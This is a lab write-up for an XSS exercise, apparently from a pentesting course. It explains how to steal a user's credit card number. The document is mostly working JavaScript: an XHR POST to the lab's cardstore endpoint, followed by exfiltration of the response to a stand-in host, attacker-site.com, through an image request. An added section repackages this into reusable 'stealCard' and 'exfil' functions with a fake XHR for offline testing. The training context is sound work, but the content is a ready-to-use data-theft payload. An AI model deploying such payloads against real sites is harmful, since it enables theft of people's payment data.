Task 15 [Try Now]
Objectives:
- Find John's Credit Card Number using an XSS vulnerability on this page
- Post the Credit Card Number to your Attacker Server
This is pretty much the same as Task 14; only the URL and the request method have changed.
The target URL is http://pentesteracademylab.appspot.com/lab/webapp/jfp/15/cardstore, and this time we have to send a POST XHR carrying user=john as form data instead of a GET with a query string.
The POST body goes in the .send() method of the XHR object. The request must be opened and the Content-Type header set before .send() is called, otherwise the header is rejected. Here is the payload:
```javascript
const xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function () {
  // readyState 4 = request complete; only exfiltrate on a successful response
  if (this.readyState == 4 && this.status == 200) {
    // Leak the card number to the attacker server via an image request.
    // encodeURIComponent keeps spaces, '&' or '#' in the response from
    // truncating the query string.
    new Image().src = "http://attacker-site.com?card=" + encodeURIComponent(xhttp.responseText);
  }
};
// Same-origin request: the XSS runs on the lab origin, so the user's session is sent with it
xhttp.open("POST", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/15/cardstore", true);
// Must be set after open() and before send(); the server expects a form-encoded body
xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhttp.send("user=john");
```
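As an added example (not part of the original write-up), the same POST-and-exfiltrate flow split into reusable pieces: a form-body encoder, an exfil URL builder that URL-encodes the stolen value, and the XHR driver written against an XHR factory so the whole flow can be exercised offline with a fake XMLHttpRequest. The lab URL is the real one; the attacker host, the fake response text and the card number are constructed placeholders.

```javascript
// Added example, not from the original write-up. Target URL is the lab's;
// the attacker host is an assumed placeholder for your own listener.
const TARGET = "http://pentesteracademylab.appspot.com/lab/webapp/jfp/15/cardstore";
const ATTACKER = "http://attacker-site.com/"; // assumption: your listener

// Encode key/value pairs as application/x-www-form-urlencoded.
function buildPostBody(fields) {
  return Object.entries(fields)
    .map(([k, v]) => encodeURIComponent(k) + "=" + encodeURIComponent(v))
    .join("&");
}

// Build the exfiltration URL. encodeURIComponent stops spaces, '&', '#'
// or '=' inside the stolen data from breaking or truncating the query.
function buildExfilUrl(base, card) {
  return base + "?card=" + encodeURIComponent(card);
}

// POST user=john via an XHR-compatible object and pass the response text
// to onCard once the request completes successfully. In the page use
// () => new XMLHttpRequest(); the factory indirection is what lets the
// flow run outside a browser with the fake below.
function stealCard(xhrFactory, onCard) {
  const xhr = xhrFactory();
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4 && xhr.status === 200) {
      onCard(xhr.responseText);
    }
  };
  xhr.open("POST", TARGET, true);
  // Header must be set after open() and before send().
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.send(buildPostBody({ user: "john" }));
}

// In a browser this fires the image request; in Node it only returns the URL.
function exfil(card) {
  const url = buildExfilUrl(ATTACKER, card);
  if (typeof Image !== "undefined") new Image().src = url;
  return url;
}

// Fake XMLHttpRequest that records calls and answers with a constructed
// response, so the exploit flow can be checked offline. The response text
// is made up for this example; it deliberately contains characters that
// would break an unencoded query string.
class FakeXHR {
  constructor(responseText) {
    this.readyState = 0;
    this.status = 0;
    this.responseText = "";
    this.calls = [];
    this._resp = responseText;
  }
  open(method, url, async) { this.calls.push(["open", method, url, async]); }
  setRequestHeader(k, v) { this.calls.push(["header", k, v]); }
  send(body) {
    this.calls.push(["send", body]);
    this.readyState = 4;
    this.status = 200;
    this.responseText = this._resp;
    if (this.onreadystatechange) this.onreadystatechange();
  }
}

// Run the flow end to end against the fake and return what was observed.
function demo() {
  const fake = new FakeXHR("4111 1111 1111 1111 & exp=12/30"); // constructed
  let url = null;
  stealCard(() => fake, (card) => { url = exfil(card); });
  return { calls: fake.calls, url };
}
```

To use it in the lab, replace the factory with `() => new XMLHttpRequest()` and drop the fake; the three helper functions are unchanged. The fake is there so you can confirm the request shape (method, header, body) and the encoded exfil URL before injecting anything.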
For POC, Click Here